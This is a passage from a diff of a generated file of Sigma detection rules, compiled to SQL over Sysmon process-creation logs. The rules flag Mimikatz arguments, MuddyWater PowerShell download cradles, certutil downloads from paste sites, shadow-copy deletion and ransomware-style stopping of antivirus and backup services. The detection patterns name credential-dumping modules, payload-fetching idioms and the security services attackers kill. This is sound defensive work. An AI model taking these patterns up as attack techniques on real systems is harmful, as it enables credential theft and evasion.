- "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.g0069" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "status": "test", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", - "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], + "description": "Detects the execution of AdvancedRun utility", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE 